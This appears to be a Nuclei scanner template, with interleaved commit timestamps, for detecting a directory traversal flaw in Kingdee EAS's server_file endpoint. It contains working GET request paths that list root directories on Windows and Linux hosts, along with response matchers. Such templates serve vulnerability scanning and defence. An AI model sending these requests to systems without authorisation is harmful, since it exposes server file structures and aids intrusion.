2022-04-05 11:50:57 +00:00
id : kingdee-eas-directory-traversal
info :
2022-04-06 08:01:21 +00:00
name : Kingdee EAS - Directory Traversal
2022-04-05 11:50:57 +00:00
author : ritikchaddha
severity : medium
description : Kingdee OA server_file has a directory traversal vulnerability, attackers can obtain sensitive server information through directory traversal.
reference :
- https://github.com/nu0l/poc-wiki/blob/main/%E9%87%91%E8%9D%B6OA%20server_file%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.md
2022-04-06 08:02:42 +00:00
tags : kingdee,lfi,traversal
2022-04-05 11:50:57 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/appmonitor/protected/selector/server_file/files?folder=C://&suffix="
- "{{BaseURL}}/appmonitor/protected/selector/server_file/files?folder=/&suffix="
2022-04-06 08:01:21 +00:00
stop-at-first-match : true
2022-04-05 11:50:57 +00:00
matchers-condition : and
matchers :
- type : word
part : body
2022-04-06 08:01:21 +00:00
words :
- '{"name":"Windows","path":"C:\\\\Windows","folder":true}'
- '{"name":"root","path":"/root","folder":true}'
condition : or
2022-04-05 11:50:57 +00:00
- type : word
words :
2022-04-06 08:01:21 +00:00
- "application/json"
2022-04-05 11:50:57 +00:00
part : header
2022-04-06 08:01:21 +00:00
- type : status
status :
- 200